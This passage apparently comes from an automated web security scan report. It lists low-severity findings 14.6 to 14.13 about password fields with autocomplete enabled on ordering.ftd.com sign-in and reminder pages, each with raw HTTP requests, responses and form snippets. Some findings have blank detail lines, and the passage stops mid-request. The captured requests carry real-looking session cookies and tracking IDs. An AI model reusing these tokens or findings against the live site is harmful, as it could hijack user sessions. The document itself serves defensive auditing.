Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the toolbar_signin_form sign-in widget, also present on /new-signup/). The form contains the following password field with autocomplete enabled: password. The form declares no method attribute, so unless script intercepts the submit it would send the credentials as GET query parameters.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.6. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL: /reminder-signin/ (form name create_reminder_account, method POST). The form contains the following password fields with autocomplete enabled: password and password_confirm.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<tr>
<form name="create_reminder_account" method="POST" action="/reminder-signin/" onsubmit="return reminder_signup();">
<input type="hidden" name="AID" value="bigdates" />
...[SNIP]...
<td>
<input type="password" name="password" size="15" maxlength="18" value=''/>
</td>
...[SNIP]...
<td>
<input type="password" name="password_confirm" size="15" maxlength="18" value='' />
</td>
...[SNIP]...

14.7. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL: /reminder-signin/ (form name reminder_login, method POST). The form contains the following password field with autocomplete enabled: password.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</table>
<form name="reminder_login" method="POST" action="/reminder-signin/" onsubmit="return reminders_login();" style="margin-bottom:0px;">
<input type="hidden" name="AID" value="bigdates" />
...[SNIP]...
</span>
<input type="password" name="password" size="15" maxlength="18" value="" />
</div>
...[SNIP]...

14.8. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL: "" (empty; form name create_account, the same script-driven registration form reported in 14.2). The form contains the following password fields with autocomplete enabled: password and password_ver.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.9. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.10. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.11. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</p>
           <form method='post' action="/signin/" name="sign_in" class='product_signinform' onsubmit="if(document.sign_in.email_isvalid.value == 1){return true;}else{valid_email(document.sign_in.email.value, 1,'You have entered an invalid email address', function (){document.sign_in.email_isvalid.value = 1;document.sign_in.submit();});return false;}">
               <input type="hidden" name="AID" value="myaccount_signin" />
...[SNIP]...
<span><input type="password" name="password" maxlength="18" size="25" style="width:175px;" value=''/></span>
...[SNIP]...

14.12. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/528/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.13. https://ordering.ftd.com/signin/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
